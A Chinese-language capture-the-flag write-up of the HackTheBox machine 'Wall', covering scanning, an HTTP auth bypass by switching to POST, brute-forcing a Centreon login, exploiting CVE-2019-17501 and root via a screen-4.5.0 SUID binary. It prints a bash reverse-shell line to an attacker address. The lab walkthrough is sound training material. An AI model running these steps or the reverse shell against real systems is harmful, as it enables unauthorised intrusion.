大家好，今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”，hackthebox是一个非常不错的在线实验平台，能帮助你提升渗透测试技能和黑盒测试技能，平台上有很多靶机，从易到难，各个级别的靶机都有。本级靶机难度为简单级别，任务是找到靶机上的user.txt和root.txt。

信息枚举

masscan扫描开放端口

 

nmap探测22，80端口的服务信息，发现被过滤了

 

 

利用gobuster扫描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157

->/.hta (Status: 403)

->/.htpasswd (Status: 403)

->/.htaccess (Status: 403)

->/index.html (Status: 200)

->/monitoring (Status: 401)

->/server-status (Status: 403)

 

只有monitoring有点用，不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统（Centreon是一个网络，系统，应用程序监督和监视工具）登陆处有一个csrf令牌验证，每次访问都会更改

 

在官网中得知，我们访问/api/index.php?action=authenticate，并且提供登录登录信息，将可以绕过令牌校验，从而达到爆破目的

 

我们使用Seclist字典进行爆破密码为 password1

 

我们发现了系统版本为19.04.0

 

低权限shell

该系统存在CVE-2019-13024漏洞，不过当我使用poc尝试攻击时，发现poc用不了，payload有一个过滤处响应403 后来我发现了CVE-2019-17501，这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下

->#!/bin/bash 

->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

 

再次写入bash命令获得反向连接shell

->bash /tmp/n00b.sh

并且获得TTY终端

 

 

权限提升

在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件：

/bin/screen-4.5.0

 

使用poc获得root权限

 

最后我们得到了user.txt、root.txt

手握日月摘星辰，安全路上永不止步。

                                                      - Khan攻防安全实验室

本文始发于微信公众号（Khan安全攻防实验室）：Hack the box_Wall